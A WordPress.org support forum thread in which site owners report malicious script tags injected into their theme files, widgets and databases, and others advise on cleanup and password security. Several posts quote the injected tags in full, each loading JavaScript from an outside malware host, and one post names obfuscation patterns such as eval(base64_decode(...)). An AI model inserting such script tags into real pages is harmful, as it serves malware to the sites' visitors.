WordPress.org

Ready to get started?Download WordPress

Forums

Malware links script from www.argoauto.net (23 posts)

  1. mistercooper
    Member
    Posted 1 year ago #

    This morning my site had this as the first line of code

    <script type="text/javascript" src="http://argoauto.net/tmp/index-bkp.php"></script>

    and Google chrome is throwing malware warnings.

    Can't find it in the header or functions files... Anyone else encountered this bug?

    Thanks
    Cooper

  2. cdanni
    Member
    Posted 1 year ago #

    This showed up on one of my sites today as well. I found the code in a footer widget. No idea how it got there.

  3. mistercooper
    Member
    Posted 1 year ago #

    Thank you, I will look there!

    Out of curiosity what version of WordPress is your install running? This client is on 3.3.1 and I'm wondering if this is still a vulnerability in the latest version.

  4. mistercooper
    Member
    Posted 1 year ago #

    Can you elaborate just a little bit on which file you found the script link in? I'm having trouble locating it.

    Thanks
    Cooper

  5. jzn21
    Member
    Posted 1 year ago #

    I got a Google warning because of malicious scripts on my website and indeed in de header.php of the theme file I saw this code:

    <script type="text/javascript" src=[ redacted, you don't need to post that here ]"></script>

    I am using a Artisteer generated template with the newest version of WordPress 3.4.2 and these plugins:

    All in One SEO Pack 1.6.15.2
    Google XML Sitemaps 3.2.8
    Hyper Cache 2.9.0.3
    Jigowatt WordPress Ajax Contact Forms 1.2.3
    MailChimp Widget 0.8.12
    Newsletters Tribulant 3.9.4
    Print Friendly and PDF 3.1.3
    Social Media Widget 2.9.4
    WP Simple Survey 2.2.9
    WP to Twitter 2.4.13

    Any similarities?

  6. funkytime
    Member
    Posted 1 year ago #

    same here, its in the Adspace Widget! for some reason in the 'adspace below article' option there is a link/script to arogoauto.net.

  7. funkytime
    Member
    Posted 1 year ago #

    make sure you change your password, someone or a script cracked your password.

  8. yabwee
    Member
    Posted 1 year ago #

    I just found that line today in the top my theme's (Suffusion) index.php. It's the 2nd time such a script has popped up there in the past 2 months. I'd love to figure out how it's getting there.

  9. mistercooper
    Member
    Posted 1 year ago #

    @jzn21, I don't think we have any plug ins or even wordpress version in common.

  10. iwo-trabka
    Member
    Posted 1 year ago #

    Same in my wp. Newest wp - version 3.4.2
    In my theme index.php there were these line with js in the top.
    Any solution for the future?
    Is this some wp bug?

  11. kstadden
    Member
    Posted 1 year ago #

    Seems like a hosting issue to me. I've contacted GoDaddy about it (via a trouble ticket, since their help line gives only a busy signal, a highly unusual sign that something's going on).

    Argoauto.net should be blacklisted by their servers, I think.

  12. kmessinger
    Volunteer Moderator
    Posted 1 year ago #

  13. ken.crosby.evb
    Member
    Posted 1 year ago #

    This shows up in my Malware search in Developer tools and a few other sites. I am unable to find 'argoauto.net' in any searches of my files or my database. Where could this be hiding. If it is gone from my files, does anyone know how it got there? Any solutions to block this?

  14. funkytime
    Member
    Posted 1 year ago #

    Have a similar script that gets added, in the 'Adspace below Article' <script type="text/javascript" src="http://61.19.251.27/web/cb.php"></script>
    This has been happening for about 4 weeks, at the begiining it was the argouto.net script.
    I have the latest wordpress and those plugins in common with jzn21

    All in One SEO Pack 1.6.15.2
    Google XML Sitemaps
    MailChimp Widget 0.8.12
    WP to Twitter 2.4.13

  15. mistercooper
    Member
    Posted 1 year ago #

    This is consistent with my infection. Removed the argoauto.net script when it popped up a couple weeks ago, today the

    <script type="text/javascript" src="redacted"></script>

    popped up. Both times it was the first line of index.php in the theme file.

  16. ken.crosby.evb
    Member
    Posted 1 year ago #

    Same exact thing happened to me.... First argoauto.net and now:
    <script type="text/javascript" src="http://61.19.251.27/web/cb.php"></script>

    This is the third time the site was blocked for malware.

    I did not find this in any of my file but in my database. I removed it from there and now my site is back up but has anyone found where this vulnerability might be? I have many plugins on the site and I am not sure where to begin to look.

    This site is enormous and I am afraid to do a complete reinstall... Any help would be greatly appreciated.

  17. woodwc
    Member
    Posted 1 year ago #

    Got that same script, same malware warning from Google. I deleted that script, which was at the very top of index.php in the main theme file. My host, bluehost.com, is not being very helpful: sent a standard "how to deal with a hack" support email. And yes, I'll go do all that, but wow, what a pain. I have pretty good backups to restore, but somehow I think the vulnerability will still be there.

    Basics: Running WordPress 3.4.2 with Weaver II Pro
    Hosted by Bluehost
    Lots of plugins, notably Contact Form 7 and Google Calendar Events

  18. woodwc
    Member
    Posted 1 year ago #

    funkytime said: "make sure you change your password, someone or a script cracked your password."

    and that seems sound, and yet I have to ask (naive security question) "how"? I was using a nine-character password with upper- and lower-case letters, at least one number, and at least one special symbol. I didn't write it down anywhere. It should have taken thousands and thousands of attempts to crack it -- shouldn't that have alerted somebody to a security problem?

    Or, to put it another way: Does alien injected code in index.php mean somebody surely has my password? Or is it more likely that some other vulnerability did it, like excessive permissions for a plugin?

    I am curious about this, not trying to be cute or snippy. When I foul up my own passwords, I usually get locked out after a handful of unsuccessful logins -- how is some hacker getting thousands and thousands of attempts?

  19. mvandemar
    Member
    Posted 1 year ago #

    Does alien injected code in index.php mean somebody surely has my password?

    No, there are many ways you can get hacked, although if you are running Windows and get a virus then it is possible for that virus to steal your password, regardless of how strong it was. If you log in or use ftp over an unsecured wireless network (Starbucks or Panera, for example) it can get stolen that way as well.

    If you're hosting on Bluehost then odds are it is not an insecurity with the server (their servers are underpowered imo, but safe). If it wasn't a virus or other password theft then most likely it would have been a script exploit, which means just fixing the visible hack won't be enough. You should do a complete rebuild of the main site (fresh core WordPress, all fresh plugins) and carefully check the theme and uploads. Also, if you are hosting more than 1 domain on that account you will need to go through the others as well to make sure nothing else was affected.

    @ken.crosby.evb -

    This shows up in my Malware search in Developer tools and a few other sites. I am unable to find 'argoauto.net' in any searches of my files or my database. Where could this be hiding.

    Sometimes code like this will be encrypted, where you won't see it in directly in either the php or the database, and it only shows once WordPress has processed the php. The most common ways are either through using long random looking base64 encoded strings (typically implemented as eval(base64_decode("... snippets), or via a line that starts like this: preg_replace("/.*/e","\x65\x76\x61.

  20. woodwc
    Member
    Posted 1 year ago #

    Thanks, that's helpful. So I guess when a password gets compromised, it's not usually a brute-force attack.

    I haven't seen much more about this particular exploit, so I guess it's not as widespread as that timthumb.php business. Basic measures seem to have the malicious code gone from my site, and when I get some time away from my day job I'll do more. (Volunteer webmaster, little community site . . . you get the picture.)

  21. rouckders242
    Member
    Posted 1 year ago #

    i just found this script inserted in our website. it created a text widget under one of our sidebars. no one seem to have a solution for this at the moment.

  22. mistercooper
    Member
    Posted 1 year ago #

    The latest line is <script type="text/javascript" src="http://denybonfante.com/app/Menu.php"></script>. Still no clue where it comes from. About once a month they appear at the top of my theme's index.

  23. karjogedhe
    Member
    Posted 1 year ago #

    I have remove the line <script type="text/javascript" src="http://denybonfante.com/app/Menu.php"></script>

    but the web still got Malware detected

    need help here :(

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags